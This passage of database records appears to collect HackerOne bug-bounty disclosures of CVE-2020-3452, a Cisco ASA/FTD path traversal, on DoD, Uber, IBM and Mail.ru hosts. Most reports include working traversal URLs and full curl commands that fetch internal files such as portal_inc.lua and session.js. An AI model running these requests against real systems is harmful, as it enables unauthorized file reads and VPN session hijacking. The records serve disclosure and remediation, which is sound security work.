Host(s)\n\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-02T21:06:18", "type": "hackerone", "title": "U.S. 
Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-02-14T21:13:45", "id": "H1:1415825", "href": "https://hackerone.com/reports/1415825", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:27:18", "bounty": 500.0, "description": "The CISCO ASA instance at anyconnect.routematch.com was vulnerable to CVE-2020-3452, allowing an unauthenticated attacker to retrieve arbitrary files on the local filesystem.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-10T18:50:53", "type": "hackerone", "title": "Uber: CVE-2020-3452 - unauthenticated file read on anyconnect.routematch.com", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-08-05T20:15:54", "id": "H1:1257100", "href": "https://hackerone.com/reports/1257100", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:26", "bounty": 0.0, "description": "**Summary:**\nI discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n## Impact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. 
This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## Step-by-step Reproduction Instructions\n- In a web browser, navigate to https://\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n- Once URL is fully loaded, you will be prompted to download file `translation-table` that represents `portal_inc.lua` which you can then open and observe its content.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n- Alternatively, you can execute the below linux bash terminal command to download that same file `portal_inc.lua`: \n\n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" --output portal_inc.lua \n```\n\n- You can download various internal files using curl flag `--output` to output the binary data to a file:\n \n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../\" --output session.js \n```\n\n## Product, Version, and Configuration (If applicable)\nWebApp endpoint\n\n## Suggested Mitigation/Remediation Actions\n- Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n- This advisory is available at the following link https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. 
As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-20T03:31:13", "type": "hackerone", "title": "U.S. Dept Of Defense: Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588.mil", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-04-02T18:42:34", "id": "H1:962908", "href": "https://hackerone.com/reports/962908", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T03:21:50", "bounty": 0.0, "description": "A vulnerability in the interface of Cisco Adaptive Security Appliance and Cisco Firepower Threat Defense (FTD) was reported to IBM, analyzed and has been remediated. 
Thank you to Khaled (0xelkomy).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-23T14:14:15", "type": "hackerone", "title": "IBM: CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-03-11T18:57:27", "id": "H1:938684", "href": "https://hackerone.com/reports/938684", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:38:37", "bounty": 0.0, "description": "Hi team. 
\n \n# Summary\n\nThe Cisco VPN Service at ```\u2588\u2588\u2588\u2588\u2588\u2588.mil``` is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversing within the web service's file system on the targeted device.\n\n\n \n# Steps to Reproduce\nMake a GET request to:\n```http\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n```\n\ncURL command:\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588.mil' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://\u2588\u2588\u2588\u2588\u2588.mil/+CSCOE+/logon.html?fcadbadd=1' -H $'DNT: 1' -H $'Connection: close' -H $'Cookie: webvpnlogin=1; webvpnLang=en' -H $'Upgrade-Insecure-Requests: 1' \\\n -b $'webvpnlogin=1; webvpnLang=en' \\\n $'https://\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'\n```\n\n..and get the content of the ```portal_inc.lua``` file.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n \n\n## Impact\n\nAccording to Cisco, this vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files, however, it has a CVE 7.5 (High) score.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-27T11:47:22", "type": "hackerone", "title": "U.S. 
Dept Of Defense: [\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil] Cisco VPN Service Path Traversal", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-16T19:48:27", "id": "H1:943717", "href": "https://hackerone.com/reports/943717", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:38:36", "bounty": 0.0, "description": "Hey,\n\nI found out that host `\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil` was vulnerable to CVE-2020-3452.\n\nYou can test it by visiting the URL:\n```\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n```\n\nTo try it with CURL please run the following command:\n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \\\n 
$'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'\n```\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nReference:\n* https://www.secpod.com/blog/cve-2020-3452-affecting-85000-cisco-asa-ftd-devices/\n* https://twitter.com/aboul3la/status/1286012324722155525\n\n## Impact\n\nAnyone can read any file present on the server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-05T11:26:03", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-16T19:49:37", "id": "H1:951530", "href": "https://hackerone.com/reports/951530", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:25:45", "bounty": 0.0, "description": "i found out that https://\u2588\u2588\u2588\u2588\u2588/ was vulnerable to CVE-2020-3452\n\nThe IP has a SSL certificate pointing to 
\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\ncurl -kv https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\n\nOutput;\n```\nServer certificate:\n\u2588\u2588\u2588\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\n1. https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n2. https://\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-29T22:45:41", "type": "hackerone", "title": "U.S. 
Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-05-12T20:03:34", "id": "H1:1555015", "href": "https://hackerone.com/reports/1555015", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:26:05", "bounty": 0.0, "description": "Hello team,\nI hope you're doing well, healthy & wealthy.\n\nI found a CVE-2020-3452 path traversal and here is the explanation.\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. 
This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## References\n\n - https://twitter.com/aboul3la/status/1286012324722155525\n - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html\n - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html\n - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html\n - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. 
This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n ** classification:**\n- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n- cvss-score: 7.50\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nCisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nPlease do this GET request below.\n\n- https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\nSecond attack type:\n\n- https://\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\nYou can see the file can be downloaded.\n\n## Suggested Mitigation/Remediation Actions\nPlease upgrade to the latest version of the software.\n\nBest regards.\n@pirneci\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-20T13:53:52", "type": "hackerone", "title": "U.S. 
Dept Of Defense: CVE-2020-3452 on https://\u2588\u2588\u2588\u2588\u2588/", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-03-18T19:05:51", "id": "H1:1455257", "href": "https://hackerone.com/reports/1455257", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:32", "bounty": 150.0, "description": "CVE-2020-3452 on webvpn.city-srv.ru", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-02T07:46:05", "type": "hackerone", "title": "Mail.ru: [webvpn.city-srv.ru] Path traversal via CVE-2020-3452", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-3452"], "modified": "2021-03-25T07:03:36", "id": "H1:949560", "href": "https://hackerone.com/reports/949560", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:25:44", "bounty": 0.0, "description": "i found out that https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ was vulnerable to CVE-2020-3452\n\nThe IP has a SSL certificate pointing to \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\ncurl -kv https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ \n\nOutput\n```\nServer certificate:\n* subject: C=US; \u2588\u2588\u2588\u2588.mil\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\n1. https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n2. https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-29T22:49:28", "type": "hackerone", "title": "U.S. 
Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-05-12T20:02:41", "id": "H1:1555021", "href": "https://hackerone.com/reports/1555021", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:26", "bounty": 0.0, "description": "**Summary:**\nI discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n## Impact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. 
The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## Step-by-step Reproduction Instructions\n- In a web browser, navigate to https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n- Once URL is fully loaded, you will be prompted to download file `translation-table` that represents `portal_inc.lua` which you can then open and observe its content.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\n- Alternatively, you can execute the below linux bash terminal command to download that same file `portal_inc.lua`: \n\n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" --output portal_inc.lua \n```\n\n- You can download various internal files using curl flag `--output` to output the binary data to a file:\n \n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../\" --output session.js \n```\n\n## Product, Version, and Configuration (If applicable)\nWebApp endpoint\n\n## Suggested Mitigation/Remediation Actions\n- Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n- This advisory is available at the following link https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. 
